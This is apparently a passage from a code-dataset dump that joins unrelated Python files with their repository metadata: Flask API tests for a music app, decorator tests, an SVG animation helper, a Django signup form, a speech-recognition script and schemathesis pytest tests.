assert rv['level'] == 'normal'
rv = self.app.post('/api/user/current/',
data={'name': 'name1',
'password': 'unknown'})
rv = json.loads(rv.data)
assert rv is None
rv = self.app.post('/api/user/current/',
data={'name': 'name2',
'password': 'pw2'})
rv = json.loads(rv.data)
assert rv is None
def test_delete(self):
add_user('name1', 'pw1', 'normal')
rv = self.app.post('/api/user/current/',
data={'name': 'name1',
'password': 'pw1'})
rv = self.app.delete('/api/user/current/')
rv = self.app.get('/api/user/current/')
rv = json.loads(rv.data)
assert rv is None
class test_user_current_history_resource(BaseResourceTest):
def test_get(self):
self.login_as_admin() # this will add a user name admin!
rv = self.app.get('/api/user/current/history/?start=0&end=10')
rv = json.loads(rv.data)
assert rv == []
rv = self.app.get('/api/user/current/history/?start=0')
rv = json.loads(rv.data)
assert rv == []
def test_post(self):
self.login_as_admin() # this will add a user name admin!
music1 = add_music('title', 'artist', 'album', 'company',
'2013', '64', self.cover, self.audio, 'uuid1')
self.cover.seek(0)
self.audio.seek(0)
music2 = add_music('title', 'artist', 'album', 'company',
'2013', '64', self.cover, self.audio, 'uuid2')
rv = self.app.get('/api/user/current/history/?start=0')
rv = json.loads(rv.data)
assert len(rv) == 0
self.app.post('/api/user/current/history/',
data={'op': 'favor', 'key': music1.key})
self.app.post('/api/user/current/history/',
data={'op': 'dislike', 'key': music2.key})
self.app.post('/api/user/current/history/',
data={'op': 'listened', 'key': music2.key})
self.app.post('/api/user/current/history/',
data={'op': 'shared', 'key': music2.key})
self.app.post('/api/user/current/history/',
data={'op': 'unknown', 'key': music2.key})
rv = self.app.get('/api/user/current/history/?start=0&end=10')
rv = json.loads(rv.data)
assert len(rv) == 4
rv = self.app.get('/api/user/current/history/?start=0')
rv = json.loads(rv.data)
assert len(rv) == 4
class test_user_current_favor_resource(BaseResourceTest):
def test_get(self):
self.login_as_admin() # this will add a user name admin!
music1 = add_music('title', 'artist', 'album', 'company',
'2013', '64', self.cover, self.audio, 'uuid1')
self.cover.seek(0)
self.audio.seek(0)
music2 = add_music('title', 'artist', 'album', 'company',
'2013', '64', self.cover, self.audio, 'uuid2')
rv = self.app.get('/api/user/current/favor/?start=0')
rv = json.loads(rv.data)
assert len(rv) == 0
rv = self.app.post('/api/user/current/history/',
data={'op': 'favor', 'key': music1.key})
print(rv.status)
assert rv.status_code == 200
rv = self.app.post('/api/user/current/history/',
data={'op': 'favor', 'key': music2.key})
assert rv.status_code == 200
rv = self.app.post('/api/user/current/history/',
data={'op': 'favor', 'key': 'unknown key'})
assert rv.status_code == 400
rv = self.app.get('/api/user/current/favor/?start=0&end=10')
rv = json.loads(rv.data)
# print rv
assert len(rv) == 2
rv = self.app.get('/api/user/current/favor/?start=0')
rv = json.loads(rv.data)
assert len(rv) == 2
| 38.989418
| 73
| 0.518795
| 940
| 7,369
| 3.98617
| 0.101064
| 0.065386
| 0.067254
| 0.092074
| 0.82039
| 0.784895
| 0.745663
| 0.732052
| 0.723779
| 0.660795
| 0
| 0.023481
| 0.312254
| 7,369
| 188
| 74
| 39.196809
| 0.715864
| 0.03759
| 0
| 0.691824
| 0
| 0
| 0.202655
| 0.07626
| 0
| 0
| 0
| 0
| 0.194969
| 0
| null | null | 0.062893
| 0.025157
| null | null | 0.006289
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e766343ebc9e5cabfb88d1bccd35040f0e60872a
| 7,827
|
py
|
Python
|
test/test_bvr_rest_before_after.py
|
doedotdev/bvr
|
023fc93424fa6a50c8a3c2ce2fc48b76a041b58c
|
[
"MIT"
] | null | null | null |
test/test_bvr_rest_before_after.py
|
doedotdev/bvr
|
023fc93424fa6a50c8a3c2ce2fc48b76a041b58c
|
[
"MIT"
] | 12
|
2019-12-07T21:40:23.000Z
|
2019-12-07T21:43:54.000Z
|
test/test_bvr_rest_before_after.py
|
doedotdev/bvr
|
023fc93424fa6a50c8a3c2ce2fc48b76a041b58c
|
[
"MIT"
] | null | null | null |
from bvr.bvr_rest import bvr_rest_before_after
def test_bvr_rest_before_after_called_as_decorator(capsys):
@bvr_rest_before_after
def rest_before_after():
return 2
return_value = rest_before_after()
captured_ouput = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_callable_returning_decorator(capsys):
@bvr_rest_before_after()
def rest_before_after():
return 2
return_value = rest_before_after()
captured_ouput = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_decorator_with_function_args(capsys):
@bvr_rest_before_after
def rest_before_after(msg):
print(msg)
return msg
return_value = rest_before_after("Hello")
captured_ouput = capsys.readouterr().out
assert return_value == "Hello"
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: ('Hello',) | KWARGS: {} \n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: ('Hello',) | KWARGS: {} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_callable_returning_decorator_with_function_args(capsys):
@bvr_rest_before_after()
def rest_before_after(msg):
print(msg)
return msg
return_value = rest_before_after("Hello")
captured_ouput = capsys.readouterr().out
assert return_value == "Hello"
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: ('Hello',) | KWARGS: {} \n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: ('Hello',) | KWARGS: {} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_decorator_with_function_kwargs(capsys):
@bvr_rest_before_after
def rest_before_after(msg):
print(msg)
return msg
return_value = rest_before_after(msg="Hello")
captured_ouput = capsys.readouterr().out
assert return_value == "Hello"
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {'msg': 'Hello'} \nHello\n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {'msg': 'Hello'} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_callable_returning_decorator_with_function_kwargs(capsys):
@bvr_rest_before_after()
def rest_before_after(msg):
print(msg)
return msg
return_value = rest_before_after(msg="Hello")
captured_ouput = capsys.readouterr().out
assert return_value == "Hello"
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {'msg': 'Hello'} \nHello\n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {'msg': 'Hello'} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_with_countdown_true(capsys):
@bvr_rest_before_after(countdown=True)
def rest_before_after():
return 2
return_value = rest_before_after()
captured_output = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 5/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_BEFORE: 4/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_BEFORE: 3/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_BEFORE: 2/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_BEFORE: 1/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 5/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 4/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 3/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 2/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 1/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_with_countdown_true_and_non_default_seconds(capsys):
@bvr_rest_before_after(seconds=2, countdown=True)
def rest_before_after():
return 2
return_value = rest_before_after()
captured_output = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 2/2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_BEFORE: 1/2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 2/2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_AFTER: 1/2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_with_countdown_false_and_non_default_seconds(capsys):
@bvr_rest_before_after(seconds=2)
def rest_before_after():
print('Hello')
return 2
return_value = rest_before_after()
captured_output = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \nHello\n" in captured_output
assert "RESTING_AFTER: 2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} " in captured_output
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_should_case_float_to_int(capsys):
@bvr_rest_before_after(seconds=2.23)
def rest_before_after():
print('Hello')
return 2
return_value = rest_before_after()
captured_output = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \nHello" in captured_output
assert "RESTING_AFTER: 2 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} " in captured_output
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
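The tests above exercise a decorator that works both bare (`@bvr_rest_before_after`) and called (`@bvr_rest_before_after(seconds=2, countdown=True)`). The library's actual implementation is not shown in this file; the following is a hypothetical sketch of that dual-use pattern, with names, defaults, and message formats inferred only from the assertions:
import functools
import time

def bvr_rest_before_after(_func=None, *, seconds=5, countdown=False):
    """Hypothetical re-implementation sketch, not the bvr source."""
    def decorator(func):
        @functools.wraps(func)  # preserves __name__, as the tests assert
        def wrapper(*args, **kwargs):
            def rest(phase):
                secs = int(seconds)  # tests expect seconds=2.23 to behave as 2
                if countdown:
                    for s in range(secs, 0, -1):
                        print(f"{phase}: {s}/{secs} second(s) | FUNCTION: {func.__name__} | ARGS: {args} | KWARGS: {kwargs} ")
                        time.sleep(1)
                else:
                    print(f"{phase}: {secs} second(s) | FUNCTION: {func.__name__} | ARGS: {args} | KWARGS: {kwargs} ")
                    time.sleep(secs)
            rest("RESTING_BEFORE")
            result = func(*args, **kwargs)
            rest("RESTING_AFTER")
            return result
        return wrapper
    # Bare use passes the function directly; called use returns the decorator.
    return decorator(_func) if callable(_func) else decorator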
| 41.632979
| 136
| 0.722755
| 1,071
| 7,827
| 4.906629
| 0.056022
| 0.173168
| 0.259753
| 0.108468
| 0.991056
| 0.983064
| 0.983064
| 0.976974
| 0.976784
| 0.970504
| 0
| 0.009437
| 0.174141
| 7,827
| 187
| 137
| 41.855615
| 0.803527
| 0.067587
| 0
| 0.735043
| 0
| 0.222222
| 0.391245
| 0
| 0
| 0
| 0
| 0
| 0.42735
| 1
| 0.17094
| false
| 0
| 0.008547
| 0.034188
| 0.264957
| 0.051282
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e79b647eaa52b87897030e594944e1286c2d77a5
| 7,637
|
py
|
Python
|
src/pydae/svg_tools.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | 1
|
2020-12-20T03:45:26.000Z
|
2020-12-20T03:45:26.000Z
|
src/pydae/svg_tools.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | null | null | null |
src/pydae/svg_tools.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 10:33:57 2021
@author: jmmau
"""
from xml.etree import ElementTree as ET
import numpy as np
class svg():
def __init__(self,input_file):
ET.register_namespace("","http://www.w3.org/2000/svg")
ET.register_namespace("inkscape","http://www.inkscape.org/namespaces/inkscape")
ET.register_namespace("sodipodi","http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd")
ET.register_namespace("cc","http://creativecommons.org/ns#")
ET.register_namespace("rdf","http://www.w3.org/1999/02/22-rdf-syntax-ns#")
self.tree = ET.parse(input_file)
self.root = self.tree.getroot()
self.g_list = self.root.findall(".//{http://www.w3.org/2000/svg}g")
self.N_steps = 1000
self.input_file = input_file
self.begin_click = False
self.begin = ''
self.anim_id = ''
self.anim_i = 0
def set_size(self,width,height):
self.root.attrib['width'] = f'{width}px'
self.root.attrib['height'] = f'{height}px'
def save(self,output_file=''):
if output_file=='':
output_file = f"{self.input_file.replace('.svg','')}_anim.svg"
self.tree.write(output_file)
def set_text(self,text_id,string):
for text in self.root.findall('.//{http://www.w3.org/2000/svg}text'):
if text.attrib['id'] == text_id: text_obj = text
for tspan in text_obj.findall('.//{http://www.w3.org/2000/svg}tspan'):
tspan.text = string
def set_title(self,element_id,string):
for text in self.root.findall('.//{http://www.w3.org/2000/svg}text'):
if text.attrib['id'] == element_id: text_obj = text
for tspan in text_obj.findall('.//{http://www.w3.org/2000/svg}tspan'):
tspan.text = string
class animatesvg():
def __init__(self,input_file,group_id):
ET.register_namespace("","http://www.w3.org/2000/svg")
ET.register_namespace("inkscape","http://www.inkscape.org/namespaces/inkscape")
ET.register_namespace("sodipodi","http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd")
ET.register_namespace("cc","http://creativecommons.org/ns#")
ET.register_namespace("rdf","http://www.w3.org/1999/02/22-rdf-syntax-ns#")
self.tree = ET.parse(input_file)
self.root = self.tree.getroot()
self.g_list = self.root.findall(".//{http://www.w3.org/2000/svg}g")
self.group_id = group_id
self.N_steps = 1000
self.input_file = input_file
self.begin_click = False
self.begin = ''
self.anim_id = ''
self.anim_i = 0
def set_size(self,width,height):
self.root.attrib['width'] = f'{width}px'
self.root.attrib['height'] = f'{height}px'
def rotate(self,times,angle,x,y):
if type(x) == float:
x = times*0+x
if type(y) == float:
y = times*0+y
t_end = times[-1]
N_t = len(times)
keyTimes = ""
keyPoints = ""
for it in range(N_t):
keyTimes += f'{times[it]/t_end};'
keyPoints += f'{angle[it]},{x[it]},{y[it]};'
keyTimes = keyTimes[:-1].replace("'",'"')
keyPoints = keyPoints[:-1].replace("'",'"')
for item in self.g_list:
if item.attrib['id'] == self.group_id:
anim = ET.Element("animateTransform")
if self.anim_id != '':
anim.set('id',self.anim_id)
anim.set('calcMode',"linear")
anim.set('additive',"sum")
anim.set('attributeType',"xml")
anim.set('attributeName',"transform")
anim.set('type',"rotate")
anim.set('dur',f"{t_end}s")
anim.set('fill',"freeze")
#anim.set('repeatCount',"indefinite")
if self.begin != '':
anim.set('begin',self.begin)
if self.begin_click:
anim.set('begin',"click")
anim.set('values',f"{keyPoints}")
anim.set('keyTimes',f"{keyTimes}")
item.insert(0, anim)
def translate(self,times,x,y):
t_end = times[-1]
N_t = len(times)
keyTimes = ""
keyPoints = ""
for it in range(N_t):
keyTimes += f'{times[it]/t_end:0.5f};'
keyPoints += f'{float(x[it]):0.3f},{float(y[it]):0.3f};'
keyTimes = keyTimes[:-1].replace("'",'"')
keyPoints = keyPoints[:-1].replace("'",'"')
for item in self.g_list:
if item.attrib['id'] == self.group_id:
anim = ET.Element("animateTransform")
if self.anim_id != '':
anim.set('id',self.anim_id)
anim.set('calcMode',"linear")
anim.set('additive',"sum")
anim.set('attributeType',"xml")
anim.set('attributeName',"transform")
anim.set('type',"translate")
anim.set('dur',f"{t_end}s")
anim.set('fill',"freeze")
#anim.set('repeatCount',"indefinite")
if self.begin != '':
anim.set('begin',self.begin)
if self.begin_click:
anim.set('begin',"click")
anim.set('values',f"{keyPoints}")
anim.set('keyTimes',f"{keyTimes}")
item.insert(0, anim)
def scale(self,times,x_0,y_0,sx,sy):
t_end = times[-1]
N_t = len(times)
keyTimes = ""
keyPoints = ""
for it in range(N_t):
keyTimes += f'{times[it]/t_end:0.5f};'
keyPoints += f'{sx[it]:0.3f},{sy[it]:0.3f};'
keyTimes = keyTimes[:-1].replace("'",'"')
keyPoints = keyPoints[:-1].replace("'",'"')
for item in self.g_list:
if item.attrib['id'] == self.group_id:
anim = ET.Element("animateTransform")
if self.anim_id != '':
anim.set('id',self.anim_id)
anim.set('calcMode',"linear")
anim.set('additive',"sum")
anim.set('attributeType',"xml")
anim.set('attributeName',"transform")
anim.set('type',"scale")
anim.set('dur',f"{t_end}s")
anim.set('fill',"freeze")
#anim.set('repeatCount',"indefinite")
if self.begin != '':
anim.set('begin',self.begin)
if self.begin_click:
anim.set('begin',"click")
anim.set('values',f"{keyPoints}")
anim.set('keyTimes',f"{keyTimes}")
item.insert(0, anim)
x = times*0+x_0*(1-sx)
y = times*0+y_0*(1-sy)
self.translate(times,x,y)
def save(self,output_file=''):
if output_file=='':
output_file = f"{self.input_file.replace('.svg','')}_anim.svg"
self.tree.write(output_file)
def reduce(self,times,values):
N_t = len(times)
mask_values = values
mask = np.array([True]*N_t)
increment = np.abs((mask_values.max()-mask_values.min())/self.N_steps)
mask[0:(N_t-1)] = np.abs(np.diff(mask_values))>increment
mask[0] = True
mask[-1] = True
self.mask = mask
self.increment = increment
return self.mask
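A minimal usage sketch for the `animatesvg` class above; the input file name and group id are placeholders, while the method signatures come from the code itself:
import numpy as np

# Hypothetical inputs: 'drawing.svg' and the group id 'wheel' are placeholders.
times = np.linspace(0.0, 10.0, 200)
anim = animatesvg('drawing.svg', 'wheel')
anim.anim_id = 'spin'
# One full turn over 10 s about the point (50, 50); x and y are passed as arrays.
anim.rotate(times, times * 36.0, times * 0 + 50.0, times * 0 + 50.0)
anim.save()  # with no argument, writes 'drawing_anim.svg' per save()'s default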
| 38.964286
| 95
| 0.509493
| 935
| 7,637
| 4.049198
| 0.147594
| 0.072108
| 0.050185
| 0.031696
| 0.839144
| 0.828579
| 0.828579
| 0.828579
| 0.828579
| 0.828579
| 0
| 0.023148
| 0.321199
| 7,637
| 196
| 96
| 38.964286
| 0.707176
| 0.024093
| 0
| 0.780488
| 0
| 0.006098
| 0.195109
| 0.031174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.012195
| 0
| 0.103659
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e7d9f26a4668107694a3683bcff21989f67cc9ad
| 251
|
py
|
Python
|
accounts/forms.py
|
jitendrapitchuka/Recommendation_system
|
82baf8c38a5c1ec1e37fc95305c8bd4a92703a6c
|
[
"MIT"
] | 1
|
2021-11-02T06:15:06.000Z
|
2021-11-02T06:15:06.000Z
|
accounts/forms.py
|
jitendrapitchuka/recommendation_system
|
82baf8c38a5c1ec1e37fc95305c8bd4a92703a6c
|
[
"MIT"
] | null | null | null |
accounts/forms.py
|
jitendrapitchuka/recommendation_system
|
82baf8c38a5c1ec1e37fc95305c8bd4a92703a6c
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import UserCreationForm
class UserCreateForm(UserCreationForm):
class Meta:
fields = ('username', 'email', 'password1', 'password2')
model = get_user_model()
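A sketch of wiring `UserCreateForm` into a signup view; the view class, URL name, and template path are assumptions, not taken from this repository:
# Hypothetical view using the form above.
from django.urls import reverse_lazy
from django.views.generic import CreateView

from .forms import UserCreateForm

class SignUpView(CreateView):
    form_class = UserCreateForm
    success_url = reverse_lazy('login')      # assumed URL name
    template_name = 'accounts/signup.html'   # assumed template path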
| 27.888889
| 59
| 0.752988
| 29
| 251
| 6.37931
| 0.62069
| 0.108108
| 0.183784
| 0.227027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009302
| 0.143426
| 251
| 9
| 60
| 27.888889
| 0.851163
| 0
| 0
| 0
| 0
| 0
| 0.123016
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.166667
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
99b07686f3c72738fa70cead4d047b6d62d903fb
| 122
|
py
|
Python
|
app/home/routes.py
|
rudSarkar/networking-lab-project
|
077d8b6af0cf04f50ea14c55f9940c665b2450be
|
[
"MIT"
] | null | null | null |
app/home/routes.py
|
rudSarkar/networking-lab-project
|
077d8b6af0cf04f50ea14c55f9940c665b2450be
|
[
"MIT"
] | null | null | null |
app/home/routes.py
|
rudSarkar/networking-lab-project
|
077d8b6af0cf04f50ea14c55f9940c665b2450be
|
[
"MIT"
] | null | null | null |
from flask import render_template
from . import home
@home.route('/')
def index():
return render_template('index.html')
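The `@home.route` decorator implies `home` is a Blueprint created in the package's `__init__.py`; a hedged sketch of the typical wiring, with the blueprint name and app factory assumed:
# Hypothetical wiring implied by the routes module above.
from flask import Blueprint, Flask

home = Blueprint('home', __name__)  # the object that routes.py imports and decorates

app = Flask(__name__)
app.register_blueprint(home)  # '/' is now served by index()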
| 17.428571
| 37
| 0.745902
| 17
| 122
| 5.235294
| 0.647059
| 0.314607
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122951
| 122
| 7
| 37
| 17.428571
| 0.831776
| 0
| 0
| 0
| 0
| 0
| 0.089431
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
99ccc58806e3be4484288d8db1cdf34aa29c2661
| 860
|
py
|
Python
|
resources/views/pythonCode.py
|
nikita191998/voiceEnabledFormFilling
|
16f2cb72826814f75cd73280cb4bd86f2a06d456
|
[
"MIT"
] | 3
|
2020-10-05T15:58:00.000Z
|
2020-10-26T17:27:43.000Z
|
resources/views/pythonCode.py
|
nikita191998/voiceEnabledFormFilling
|
16f2cb72826814f75cd73280cb4bd86f2a06d456
|
[
"MIT"
] | null | null | null |
resources/views/pythonCode.py
|
nikita191998/voiceEnabledFormFilling
|
16f2cb72826814f75cd73280cb4bd86f2a06d456
|
[
"MIT"
] | null | null | null |
import speech_recognition as sr
def SpeechToText():
r= sr.Recognizer()
with sr.Microphone() as source:
Text= 'Nothing'
print('say something')
audio = r.listen(source)
print('Time over, Thanks')
try:
Text = r.recognize_google(audio, language="en-IN")
print('Text: ' + Text)  # reuse the result instead of calling the API twice
except:
pass
return Text
def Speech():
r= sr.Recognizer()
with sr.Microphone() as source:
Text= 'Nothing'
print('say something')
audio = r.listen(source)
print('Time over, Thanks')
try:
Text = r.recognize_google(audio, language="hi-IN")
print('Text: ' + Text)  # reuse the result instead of calling the API twice
except:
pass
return Text
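A usage sketch for the functions above; it assumes a working microphone, the SpeechRecognition package with a PyAudio backend installed, and network access for the Google Web Speech API:
# Requires: pip install SpeechRecognition pyaudio
if __name__ == '__main__':
    spoken = SpeechToText()  # English (en-IN) recognition; returns 'Nothing' on failure
    print('You said:', spoken)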
| 26.875
| 71
| 0.539535
| 95
| 860
| 4.831579
| 0.336842
| 0.043573
| 0.122004
| 0.174292
| 0.888889
| 0.801743
| 0.801743
| 0.801743
| 0.601307
| 0.601307
| 0
| 0
| 0.339535
| 860
| 31
| 72
| 27.741935
| 0.808099
| 0
| 0
| 0.740741
| 0
| 0
| 0.123256
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0.074074
| 0.037037
| 0
| 0.185185
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
99f350a767a3765e043b512c36ca57a93132c3d8
| 3,067
|
py
|
Python
|
test/test_pytest.py
|
chr1st1ank/schemathesis
|
f2e160d56c1fdce9eac7fee5875b209c8944f54a
|
[
"MIT"
] | null | null | null |
test/test_pytest.py
|
chr1st1ank/schemathesis
|
f2e160d56c1fdce9eac7fee5875b209c8944f54a
|
[
"MIT"
] | null | null | null |
test/test_pytest.py
|
chr1st1ank/schemathesis
|
f2e160d56c1fdce9eac7fee5875b209c8944f54a
|
[
"MIT"
] | null | null | null |
def test_pytest_parametrize_fixture(testdir):
# When `pytest_generate_tests` is used on a module level for fixture parametrization
testdir.make_test(
"""
def pytest_generate_tests(metafunc):
metafunc.parametrize("inner", ("A", "B"))
@pytest.fixture()
def param(inner):
return inner * 2
@schema.parametrize()
def test_(request, param, case):
request.config.HYPOTHESIS_CASES += 1
assert case.path == "/v1/users"
assert case.method in ("GET", "POST")
""",
paths={
"/users": {
"get": {"responses": {"200": {"description": "OK"}}},
"post": {"responses": {"200": {"description": "OK"}}},
}
},
)
# And there are multiple method/endpoint combinations
result = testdir.runpytest("-v", "-s")
# Then the total number of tests should be Method/Endpoint combos x parameters in `pytest_generate_tests`
# I.e. regular pytest parametrization logic should be applied
result.assert_outcomes(passed=4)
result.stdout.re_match_lines(
[
r"test_pytest_parametrize_fixture.py::test_\[GET:/v1/users\]\[A\] PASSED",
r"test_pytest_parametrize_fixture.py::test_\[GET:/v1/users\]\[B\] PASSED",
r"test_pytest_parametrize_fixture.py::test_\[POST:/v1/users\]\[A\] PASSED",
r"test_pytest_parametrize_fixture.py::test_\[POST:/v1/users\]\[B\] PASSED",
r"Hypothesis calls: 4",
]
)
def test_pytest_parametrize_class_fixture(testdir):
# When `pytest_generate_tests` is used on a class level for fixture parametrization
testdir.make_test(
"""
class TestAPI:
def pytest_generate_tests(self, metafunc):
metafunc.parametrize("inner", ("A", "B"))
@pytest.fixture()
def param(self, inner):
return inner * 2
@schema.parametrize()
def test_(self, request, param, case):
request.config.HYPOTHESIS_CASES += 1
assert case.path == "/v1/users"
assert case.method in ("GET", "POST")
""",
paths={
"/users": {
"get": {"responses": {"200": {"description": "OK"}}},
"post": {"responses": {"200": {"description": "OK"}}},
}
},
)
# And there are multiple method/endpoint combinations
result = testdir.runpytest("-v", "-s")
# Then the total number of tests should be Method/Endpoint combos x parameters in `pytest_generate_tests`
# I.e. regular pytest parametrization logic should be applied
result.assert_outcomes(passed=4)
result.stdout.re_match_lines(
[
r"test_pytest_parametrize_class_fixture.py::TestAPI::test_\[GET:/v1/users\]\[A\] PASSED",
r"test_pytest_parametrize_class_fixture.py::TestAPI::test_\[GET:/v1/users\]\[B\] PASSED",
r"test_pytest_parametrize_class_fixture.py::TestAPI::test_\[POST:/v1/users\]\[A\] PASSED",
r"test_pytest_parametrize_class_fixture.py::TestAPI::test_\[POST:/v1/users\]\[B\] PASSED",
r"Hypothesis calls: 4",
]
)
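The fixture parametrization these tests rely on is plain pytest machinery; stripped of schemathesis, the same `pytest_generate_tests` hook looks like this minimal standalone sketch:
# Minimal pytest_generate_tests example (no schemathesis involved).
import pytest

def pytest_generate_tests(metafunc):
    if 'inner' in metafunc.fixturenames:
        metafunc.parametrize('inner', ('A', 'B'))

@pytest.fixture()
def param(inner):
    return inner * 2

def test_param(param):
    # Runs twice, once per parametrized value of 'inner'.
    assert param in ('AA', 'BB')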
| 37.864198
| 109
| 0.619824
| 364
| 3,067
| 5.038462
| 0.225275
| 0.054526
| 0.114504
